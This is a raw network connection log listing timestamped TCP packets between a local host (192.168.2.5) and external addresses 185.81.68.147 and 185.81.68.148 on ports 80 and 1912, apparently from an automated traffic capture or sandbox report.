Dec 13, 2024 01:37:23.676696062 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.676760912 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.676815987 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.678075075 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.678132057 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.678193092 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.679511070 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.679553986 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.679564953 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.680773020 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.680960894 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.681086063 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.681134939 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.682400942 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.682495117 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.682558060 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.683834076 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.683952093 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.684005022 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.685267925 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.685364962 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.686745882 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.686810970 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.686822891 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.688122988 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.688175917 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.688244104 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.688776970 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.689568996 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.689656973 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.690990925 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.691023111 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.691071987 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.691097021 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.692444086 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.692630053 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.692795992 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.693845034 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.693944931 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.694190025 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.695257902 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.695425034 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.695489883 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.696728945 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.696854115 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.698134899 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.698204041 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.698256969 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.699598074 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.699675083 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.699693918 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.700778961 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.701014042 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.701138020 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.701191902 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.702452898 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.702557087 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.702621937 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.703882933 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.704008102 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.704075098 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.705331087 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.705470085 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.706774950 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.706860065 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.706882954 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.708209038 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.708276033 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.708316088 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.708782911 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.709609985 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.709738016 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.709795952 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.711060047 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.711203098 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.711251020 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.712481976 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.712590933 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.712781906 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.713905096 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.714034081 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.714092016 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.715356112 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.715447903 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.715636969 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.716748953 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.770322084 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.836783886 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.836898088 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.837017059 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.837322950 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.837487936 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.838234901 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.838557005 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.838675976 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.838737011 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.839807987 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.839900970 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.840177059 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.841083050 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.841197014 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.841269970 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.842288971 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.842366934 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.843492031 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.843578100 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.843650103 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.844733953 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.844851017 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.845972061 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.846043110 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.846076965 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.847182989 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.847244978 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.847301960 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.848440886 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.848494053 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.848500967 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.848769903 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.849678993 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.849822044 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.849873066 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.850897074 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.851027966 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.851092100 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.852108002 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.852221966 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.852278948 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.853364944 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.853481054 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.853529930 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.854600906 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.854718924 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.854764938 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.855804920 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.855943918 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.857063055 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.857167006 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.857676029 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.858285904 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.858365059 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.858438969 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.859554052 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.859666109 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.859721899 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.860758066 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.860873938 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.860920906 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.861977100 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.862077951 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.862128019 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.863203049 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.863342047 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.863393068 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.864465952 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.864586115 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.864635944 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.865657091 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.865753889 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.865801096 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.866880894 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.867002010 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.867050886 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.868170023 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.868257999 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.868304014 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.869368076 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.869452000 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.869499922 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.870668888 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.870763063 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.870817900 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.871949911 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.872062922 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.872109890 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.873116016 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.873264074 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.873327017 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.874313116 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.874423981 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.874489069 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.875538111 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.875636101 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.875680923 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.876817942 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.876843929 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.876888037 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.877999067 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.878114939 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.878168106 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.879236937 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.879369974 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.879417896 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.880489111 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.880670071 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.880733967 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.881720066 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.881814003 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.881859064 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.882955074 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.883068085 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.883121014 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.884176016 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.884301901 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.884347916 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.885400057 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.885504961 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.885549068 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.886640072 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.886780977 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.886823893 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.887912989 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.888022900 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.888071060 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.889122963 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.889240980 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.889296055 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.890382051 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.890502930 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.890566111 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.891607046 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.891719103 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.891783953 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.892832041 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.892940044 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.893004894 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.894053936 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.894169092 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.894228935 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.895272970 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.895387888 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.895446062 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.896508932 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:23.896590948 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:23.896610975 CET	49726	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:24.016639948 CET	80	49726	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:24.083343029 CET	49732	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:24.203177929 CET	80	49732	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:24.203260899 CET	49732	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:24.203330040 CET	49732	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:24.323115110 CET	80	49732	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:24.323175907 CET	49732	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:24.442970037 CET	80	49732	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:25.136694908 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:25.256771088 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:25.256907940 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:25.266942024 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:25.386883020 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:25.665555954 CET	80	49732	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:25.665626049 CET	80	49732	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:25.665679932 CET	49732	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:25.666855097 CET	49732	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:25.770833015 CET	49739	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:25.789239883 CET	80	49732	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:25.890938997 CET	80	49739	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:25.891099930 CET	49739	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:25.891144991 CET	49739	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:26.011147022 CET	80	49739	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:26.011365891 CET	49739	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:26.131361961 CET	80	49739	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:26.623411894 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:26.656311989 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:26.776254892 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:27.096738100 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:27.145351887 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:27.531460047 CET	80	49739	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:27.531640053 CET	80	49739	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:27.531698942 CET	49739	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:27.539254904 CET	49739	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:27.645991087 CET	49745	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:27.658981085 CET	80	49739	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:27.765779972 CET	80	49745	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:27.765870094 CET	49745	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:27.765964031 CET	49745	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:27.886066914 CET	80	49745	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:27.886140108 CET	49745	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:28.025763035 CET	80	49745	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.378494024 CET	49752	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:29.378505945 CET	49751	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.394916058 CET	80	49745	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.394983053 CET	80	49745	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.395095110 CET	49745	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.396979094 CET	49745	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.427761078 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.498323917 CET	80	49752	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:29.498405933 CET	80	49751	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.498430967 CET	49752	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:29.498476028 CET	49751	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.498703957 CET	49751	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.498817921 CET	49752	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:29.505315065 CET	49754	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.516712904 CET	80	49745	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.547544956 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.547683001 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.547888041 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.618416071 CET	80	49751	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.618474007 CET	80	49752	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:29.625279903 CET	80	49754	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.625463963 CET	49754	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.625463963 CET	49754	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.667651892 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.745491982 CET	80	49754	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:29.748852015 CET	49754	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:29.873089075 CET	80	49754	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.834928036 CET	80	49752	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:30.834966898 CET	80	49751	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.835138083 CET	49752	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:30.835150003 CET	49751	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873532057 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873564959 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873615980 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873651028 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873665094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873682022 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873701096 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873708010 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873737097 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873747110 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873773098 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873776913 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873809099 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873819113 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873868942 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873888016 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873908997 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.873914003 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.873950958 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.993978024 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.994019985 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.994051933 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.994083881 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.998089075 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.998119116 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:30.998142004 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:30.998158932 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.066291094 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.066386938 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.066431046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:31.066622019 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:31.070426941 CET	80	49753	185.81.68.147	192.168.2.5
